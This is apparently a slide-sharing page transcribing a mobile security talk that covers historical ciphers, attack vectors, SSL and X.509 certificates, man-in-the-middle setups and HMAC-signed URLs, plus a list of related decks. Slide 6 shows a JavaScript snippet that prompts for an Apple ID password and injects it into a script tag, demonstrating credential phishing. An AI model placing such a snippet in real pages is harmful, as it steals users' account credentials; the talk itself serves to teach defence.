safety 1st mobile security
play

Safety 1st Mobile Security Markus Kopf | payleven Mobile Threat - PowerPoint PPT Presentation

Aug 17, 2023 •449 likes •1.01k views

Safety 1st Mobile Security Markus Kopf | payleven Mobile Threat <script type="mce-text/javascript"> // <![CDATA[ password = prompt("Apple ID Password",""); var s = document.createElement('script'); s.type

  1. Safety 1st Mobile Security Markus Kopf | payleven

  4. Mobile Threat

  6. <script type="mce-text/javascript"> // <![CDATA[ password = prompt("Apple ID Password",""); var s = document.createElement('script'); s.type = "text/javascript"; s.src = "fakepassword=" + password; var script = document.createTextNode(s); document.getElementsByTagName('head')[0].appendChild(s); // ]]></script>

  9. History

  10. Historic Cypher Antique Chiffren Caesar Skytale Modern Cypher Maria - Stuart – Chiffre (1586) Vigenere – Chiffre (1586) ENIGMA (1923 - 1945) „caesar“ „FDHVDU“

  11. Skytale Used 2500 years ago by the Spartans

  12. Enigma (Rätsel) 1923 invention by Arthur Scherbius

  13. http://de.wikipedia.org/wiki/Freimaurer-Alphabet

  14. Asymmetric crypto

  15. Asymmetric crypto

  18. Attack Vectors • The device • The network • Third-party Apps • Weak encryption • Operating System • MITM • Bluetooth • Session hijacking • Fake SSL Certificates • The Data Center • Web server • Database

  19. Back to school

  20. SSL SSL = Secure Socket Layer 1994 Netscape Security services SSL Confidentiality Integrity Authenticity of the client (optional) and server Key- and algorithm agreement.

  21. Security Transport Layer

  22. SSL Handshake Authentication / identification of server and (optionally) client - Negotiation of algorithms - Exchange keys

  23. SSL Pro and Cons Advantage : • easy to use • Secure • widespread Disadvantage : • SSL provides only secure tunnel between the client and server (channel coding) • Authentication based on X.509 - certificates: Users are unclear about the meaning.

  24. Version: ¡3 ¡(0x2) Certificates ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡Serial ¡Number: ¡1 ¡(0x1) ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡Signature ¡Algorithm: ¡md5WithRSAEncryption ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡Issuer: ¡C=XY, ¡ST=Austria, ¡L=Graz, ¡O=TrustMe ¡Ltd, ¡OU=Certificate ¡Authority, ¡CN=CA/Email=ca@trustme.dom ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡Validity ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡Not ¡Before: ¡Oct ¡29 ¡17:39:10 ¡2000 ¡GMT ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡Not ¡After ¡: ¡Oct ¡29 ¡17:39:10 ¡2001 ¡GMT ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡Subject: ¡C=DE, ¡ST=Austria, ¡L=Vienna, ¡O=Home, ¡OU=Web ¡Lab, ¡CN=anywhere.com/Email=xyz@anywhere.com ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡Subject ¡Public ¡Key ¡Info: ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡Public ¡Key ¡Algorithm: ¡rsaEncryption ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡RSA ¡Public ¡Key: ¡(1024 ¡bit) Confirmation that a public key belongs to an individual ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡Modulus ¡(1024 ¡bit): ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡00:c4:40:4c:6e:14:1b:61:36:84:24:b2:61:c0:b5: digitally signed by specific service providers or authorities ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡d7:e4:7a:a5:4b:94:ef:d9:5e:43:7f:c1:64:80:fd: ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡9f:50:41:6b:70:73:80:48:90:f3:58:bf:f0:4c:b9: X.509 Certificate: ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡90:32:81:59:18:16:3f:19:f4:5f:11:68:36:85:f6: ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡1c:a9:af:fa:a9:a8:7b:44:85:79:b5:f1:20:d3:25: ITU (International Telecommunications Union) Standard ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡7d:1c:de:68:15:0c:b6:bc:59:46:0a:d8:99:4e:07: ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡50:0a:5d:83:61:d4:db:c9:7d:c3:2e:eb:0a:8f:62: ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡8f:7e:00:e1:37:67:3f:36:d5:04:38:44:44:77:e9: X. 509 Certificate containing at least the following elements: ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡f0:b4:95:f5:f9:34:9f:f8:43 ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡Exponent: ¡65537 ¡(0x10001) Serial number ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡X509v3 ¡extensions: ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡X509v3 ¡Subject ¡Alternative ¡Name: Signature algorithm (the algorithm used to sign the cert.) ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡email:xyz@anywhere.com ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡Netscape ¡Comment: Issuer Name (Name of the issuing CA) ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡mod_ssl ¡generated ¡test ¡server ¡certificate ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡Netscape ¡Cert ¡Type: Validity period ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡SSL ¡Server ¡ ¡ ¡ ¡Signature ¡Algorithm: ¡md5WithRSAEncryption ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡12:ed:f7:b3:5e:a0:93:3f:a0:1d:60:cb:47:19:7d:15:59:9b: Subject Name (owner of the certificates) ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡3b:2c:a8:a3:6a:03:43:d0:85:d3:86:86:2f:e3:aa:79:39:e7: ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡82:20:ed:f4:11:85:a3:41:5e:5c:8d:36:a2:71:b6:6a:08:f9: Subject Public Key Info (Public key of the owner and public key algorithm) ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡cc:1e:da:c4:78:05:75:8f:9b:10:f0:15:f0:9e:67:a0:4e:a1: ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡4d:3f:16:4c:9b:19:56:6a:f2:af:89:54:52:4a:06:34:42:0d: Signature Value (Digital signature of the issuing CA of the entire certificate) ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡d5:40:25:6b:b0:c0:a2:03:18:cd:d1:07:20:b6:e5:c5:1e:21: ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡44:e7:c5:09:d2:d5:94:9d:6c:13:07:2f:3b:7c:4c:64:90:bf: ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ff:8e

  25. Certificate: Data: Version: 3 (0x2) Serial Number: 1 (0x1) Signature Algorithm: md5WithRSAEncryption Issuer: C=ZA, ST=Western Cape, L=Cape Town, O=Thawte Consulting cc, OU=Certification Services Division, CN=Thawte Server CA/emailAddress=server-certs@thawte.com Validity Not Before: Aug 1 00:00:00 1996 GMT Not After : Dec 31 23:59:59 2020 GMT Subject: C=ZA, ST=Western Cape, L=Cape Town, O=Thawte Consulting cc, OU=Certification Services Division, CN=Thawte Server CA/emailAddress=server-certs@thawte.com Subject Public Key Info : Public Key Algorithm: rsaEncryption RSA Public Key: (1024 bit) Modulus (1024 bit): 00:d3:a4:50:6e:c8:ff:56:6b:e6:cf:5d:b6:ea:0c: 68:75:47:a2:aa:c2:da:84:25:fc:a8:f4:47:51:da: 85:b5:20:74:94:86:1e:0f:75:c9:e9:08:61:f5:06: 6d:30:6e:15:19:02:e9:52:c0:62:db:4d:99:9e:e2: 6a:0c:44:38:cd:fe:be:e3:64:09:70:c5:fe:b1:6b: 29:b6:2f:49:c8:3b:d4:27:04:25:10:97:2f:e7:90: 6d:c0:28:42:99:d7:4c:43:de:c3:f5:21:6d:54:9f: 5d:c3:58:e1:c0:e4:d9:5b:b0:b8:dc:b4:7b:df:36: 3a:c2:b5:66:22:12:d6:87:0d Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Basic Constraints: critical CA:TRUE Signature Algorithm: md5WithRSAEncryption 07:fa:4c:69:5c:fb:95:cc:46:ee:85:83:4d:21:30:8e:ca:d9: a8:6f:49:1a:e6:da:51:e3:60:70:6c:84:61:11:a1:1a:c8:48: 3e:59:43:7d:4f:95:3d:a1:8b:b7:0b:62:98:7a:75:8a:dd:88: 4e:4e:9e:40:db:a8:cc:32:74:b9:6f:0d:c6:e3:b3:44:0b:d9: 8a:6f:9a:29:9b:99:18:28:3b:d1:e3:40:28:9a:5a:3c:d5:b5: e7:20:1b:8b:ca:a4:ab:8d:e9:51:d9:e2:4c:2c:59:a9:da:b9: b2:75:1b:f6:42:f2:ef:c7:f2:18:f9:89:bc:a3:ff:8a:23:2e: 70:47

  26. MITM

  27. MITM

  28. What do we need?

  29. Setup

  33. Manipulate Request

  35. Safety

  36. Slightly better approach... hMac your URL’s http://tinyurl.com/7wffcwd

  37. Message Authentication Codes (MACS) Motivation: Protection against unauthorized manipulation of data (integrity protection) unauthorized sending messages on behalf of others (Message Authentication) Idea: Calculate cryptographic checksum (MAC) with the following properties: Not be forged Changes with small changes of the message

  38. Message Authentication with MAC NACHRICHT NACHRICHT MAC-Alg. Geheimer Schlüssel k MAC Secure MAC-Alg. Key k = Empfänger

Recommend

CS 528 Mobile and Ubiquitous Computing Lecture 11: Mobile Security and Mobile Software

CS 528 Mobile and Ubiquitous Computing Lecture 11: Mobile Security and Mobile Software

CS 528 Mobile and Ubiquitous Computing Lecture 11: Mobile Security and Mobile Software Vulnerabilities Emmanuel Agu Mobile Security Issues Introduction So many cool mobile apps Access to web, personal information, social media, etc

1.05k views • 55 slides
What, exactly, is different or new about MOBILE mobile security? SECURITY TECHNOLOGIES 2017

What, exactly, is different or new about MOBILE mobile security? SECURITY TECHNOLOGIES 2017

What, exactly, is different or new about MOBILE mobile security? SECURITY TECHNOLOGIES 2017 Dan S. Wallach , Rice University tl;dr The computers inside the computer Every chip has one or more CPUs inside; they have exploitable bugs

1.23k views • 87 slides
Safety and Security Certification Program Safety and Security Certification A process to

Safety and Security Certification Program Safety and Security Certification A process to

Safety and Security Certification Program Safety and Security Certification A process to assure that safety &amp; security concerns, vulnerabilities, and hazards are adequately addressed prior to the initiation of service. Safety and

97 views • 9 slides
Latest Trends in Mobile Security By M K Chaithanya C-DAC Hyderabad Outline Introduction

Latest Trends in Mobile Security By M K Chaithanya C-DAC Hyderabad Outline Introduction

Latest Trends in Mobile Security By M K Chaithanya C-DAC Hyderabad Outline Introduction Statistics of Mobile Usage Current State of Mobile Security Recent Attacks Various Mobile Threats Security &amp; Privacy

1.03k views • 57 slides
Mobile network security issues A very short overview of some mobile security issues.

Mobile network security issues A very short overview of some mobile security issues.

Mobile network security issues A very short overview of some mobile security issues. Mobile access is expected to become the main access method. Services and mobile commerce (mCommerce) are expected to become a major business.

818 views • 20 slides
CS 528 Mobile and Ubiquitous Computing Lecture 9a: Mobile Security and Mobile Software

CS 528 Mobile and Ubiquitous Computing Lecture 9a: Mobile Security and Mobile Software

CS 528 Mobile and Ubiquitous Computing Lecture 9a: Mobile Security and Mobile Software Vulnerabilities Emmanuel Agu Announcement Course Evaluations Now online Will be available from Friday, Dec 7 Will also allow students to do

864 views • 50 slides
Mobile Device and Platform Security Part II John Mitchell Two lectures on mobile security

Mobile Device and Platform Security Part II John Mitchell Two lectures on mobile security

CS 155 Spring 2018 Mobile Device and Platform Security Part II John Mitchell Two lectures on mobile security Introduction: platforms and trends Threat categories Physical, platform malware, malicious apps Defense

1.17k views • 93 slides
CAC Safety Report 2018-19 John Heiderscheidt Director of Safety and Culture Safety and Security

CAC Safety Report 2018-19 John Heiderscheidt Director of Safety and Culture Safety and Security

CAC Safety Report 2018-19 John Heiderscheidt Director of Safety and Culture Safety and Security Technology What has been done to address safety and security? Using Safety Technology BASCO - Building Access Security Control Office

445 views • 26 slides
Mobile Device and Platform Security John Mitchell Two lectures on mobile security Introduction:

Mobile Device and Platform Security John Mitchell Two lectures on mobile security Introduction:

Spring 2018 CS 155 Mobile Device and Platform Security John Mitchell Two lectures on mobile security Introduction: platforms and trends Threat categories n Physical, platform malware, malicious apps Defense against physical theft Thurs

1.28k views • 64 slides
Mobile Communications Mobile Communications Confidentiality Security No access to information

Mobile Communications Mobile Communications Confidentiality Security No access to information

Security Requirements Authorization Which objects are accessible by whom? Authentication Reliable identification of users identity . Mobile Communications Mobile Communications Confidentiality Security No access to information for

577 views • 11 slides
Mobile security: Tips and tricks for securing your iPhone, Android and other mobile devices

Mobile security: Tips and tricks for securing your iPhone, Android and other mobile devices

Mobile security: Tips and tricks for securing your iPhone, Android and other mobile devices Presented by Michael Harris [MS, CISSP, WAPT] Systems Security Analyst University of Missouri Overview What data needs to be protected, what

407 views • 18 slides
Training Mobile Application Presented by: Loh Yeow Leng Safety Induction Training Mobile

Training Mobile Application Presented by: Loh Yeow Leng Safety Induction Training Mobile

Safety Induction Training Mobile Application Presented by: Loh Yeow Leng Safety Induction Training Mobile Application Background To improve Workplace Safety and Health awareness of construction workers, the Singapore Contractors

465 views • 32 slides
CS 528 Mobile and Ubiquitous Computing Lecture 11b: Mobile Security and Mobile Software

CS 528 Mobile and Ubiquitous Computing Lecture 11b: Mobile Security and Mobile Software

CS 528 Mobile and Ubiquitous Computing Lecture 11b: Mobile Security and Mobile Software Vulnerabilities Emmanuel Agu Authentication using Biometrics Biometrics Passwords tough to remember, manage Many users have simple passwords (e.g.

506 views • 34 slides
CS 528 Mobile and Ubiquitous Computing Lecture 9b: Mobile Security and Mobile Measurements

CS 528 Mobile and Ubiquitous Computing Lecture 9b: Mobile Security and Mobile Measurements

CS 528 Mobile and Ubiquitous Computing Lecture 9b: Mobile Security and Mobile Measurements Emmanuel Agu Authentication using Biometrics Biometrics Passwords tough to remember, manage Many users have simple passwords (e.g. 1234) or do

827 views • 54 slides
CS 528 Mobile and Ubiquitous Computing Lecture 10b: Mobile Security and Mobile Measurements

CS 528 Mobile and Ubiquitous Computing Lecture 10b: Mobile Security and Mobile Measurements

CS 528 Mobile and Ubiquitous Computing Lecture 10b: Mobile Security and Mobile Measurements Emmanuel Agu Authentication using Biometrics Biometrics Passwords tough to remember, manage Many users have simple passwords (e.g. 1234) or do

780 views • 54 slides
SECURITY &amp; SAFETY AWARENESS TRAINING Purpose of Security &amp; Safety Plan To inform

SECURITY &amp; SAFETY AWARENESS TRAINING Purpose of Security &amp; Safety Plan To inform

SECURITY &amp; SAFETY AWARENESS TRAINING Purpose of Security &amp; Safety Plan To inform employee of risk and threats To inform employee of companys safety &amp; security plans for: Company Terminals Customer To make

465 views • 15 slides
Mobile and Ubiquitous Computing on Smartphones Lecture 10b: Mobile Security and Mobile Software

Mobile and Ubiquitous Computing on Smartphones Lecture 10b: Mobile Security and Mobile Software

Mobile and Ubiquitous Computing on Smartphones Lecture 10b: Mobile Security and Mobile Software Vulnerabilities Emmanuel Agu Authentication using Biometrics Biometrics Passwords tough to remember, manage Many users have simple passwords

520 views • 38 slides
CSE 543 - Computer Security Lecture 26 - Mobile phone security December 11, 2007 URL:

CSE 543 - Computer Security Lecture 26 - Mobile phone security December 11, 2007 URL:

CSE 543 - Computer Security Lecture 26 - Mobile phone security December 11, 2007 URL: http://www.cse.psu.edu/~tjaeger/cse543-f07/ CSE543 Computer (and Network) Security - Fall 2007 - Professor Jaeger 1 Mobile Phones Networked device

302 views • 11 slides
Steroids For Your App Security Assessment Marco Grassi Mobile Security Researcher ~ whoami

Steroids For Your App Security Assessment Marco Grassi Mobile Security Researcher ~ whoami

Steroids For Your App Security Assessment Marco Grassi Mobile Security Researcher ~ whoami R&amp;D Team Member @ viaForensics I work mainly on Android/iOS The Problem We want to trace the code in mobile applications that we

632 views • 48 slides
Motivation Big and growing mobile Internet 2 7 B mobile phone users (cf 850 MM PCs) 2.7 B

Motivation Big and growing mobile Internet 2 7 B mobile phone users (cf 850 MM PCs) 2.7 B

Private Queries in Location Based Services New technologies can pinpoint your location at any time and place. They promise safety and convenience but i f d i b threaten privacy and security IEEE Spectrum, July 2003 Motivation

1.02k views • 24 slides
Security Update Security Plans Our Security plans are For Official Use Only, Safety

Security Update Security Plans Our Security plans are For Official Use Only, Safety

Security Update Security Plans Our Security plans are For Official Use Only, Safety Sensitive Information Not for public or media release F.S. 119.071. Required by law, rule and regulation: Homeland Security Directive 5 and 8.

393 views • 11 slides
Task Force 1 Counterfeit semiconductors threaten health, safety &amp; security of everyone

Task Force 1 Counterfeit semiconductors threaten health, safety &amp; security of everyone

World Semiconductor Council Anticounterfeiting Task Force 1 Counterfeit semiconductors threaten health, safety &amp; security of everyone Semiconductors are used in a wide variety of critically- important applications- computers, mobile

516 views • 29 slides
Mobile Communications Mobile Communications Security Types of Attacks 802.11 Security

Mobile Communications Mobile Communications Security Types of Attacks 802.11 Security

Mobile Communications Mobile Communications Security Types of Attacks 802.11 Security Access Control Lists Access Control Lists GSM Security GSM Security WEP Authentication WPA/WPA2 Encryption 802.1X/EAP

409 views • 15 slides
Mobile Communications Mobile Communications Security Types of Attacks 802.11 Security

Mobile Communications Mobile Communications Security Types of Attacks 802.11 Security

Mobile Communications Mobile Communications Security Types of Attacks 802.11 Security Access Control Lists Access Control Lists GSM Security GSM Security WEP Authentication WPA/WPA2 Encryption 802.1X/EAP

536 views • 43 slides

More recommend